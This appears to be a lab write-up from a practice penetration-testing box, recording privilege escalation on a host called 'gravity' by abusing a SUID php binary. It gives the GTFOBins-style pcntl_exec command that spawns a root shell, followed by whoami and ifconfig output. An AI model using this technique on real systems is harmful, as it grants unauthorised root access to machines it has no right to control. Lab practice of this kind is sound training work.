SUID php
php binary has been identified to have SUID bit set. This was confirmed by PEAS at a later stage
/Practice/Astronaut/5-Privilege_Escalation/attachments/{1A95A20A-3A57-48B8-B6EA-50F9A9884FF4}.png)
According to GTFObins, php can be abused for privilege escalation
www-data@gravity:~$ CMD="/bin/sh"
www-data@gravity:~$ /usr/bin/php7.4 -r "pcntl_exec('/bin/sh', ['-p']);"
whoami
root
hostname
gravity
ifconfig
/bin/sh: 3: ifconfig: not found
/sbin/ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.154.12 netmask 255.255.255.0 broadcast 192.168.154.255
ether 00:50:56:9e:67:3a txqueuelen 1000 (Ethernet)
RX packets 1822807 bytes 193292722 (193.2 MB)
RX errors 0 dropped 498 overruns 0 frame 0
TX packets 1525939 bytes 1276643003 (1.2 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 3426 bytes 328534 (328.5 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3426 bytes 328534 (328.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System level compromise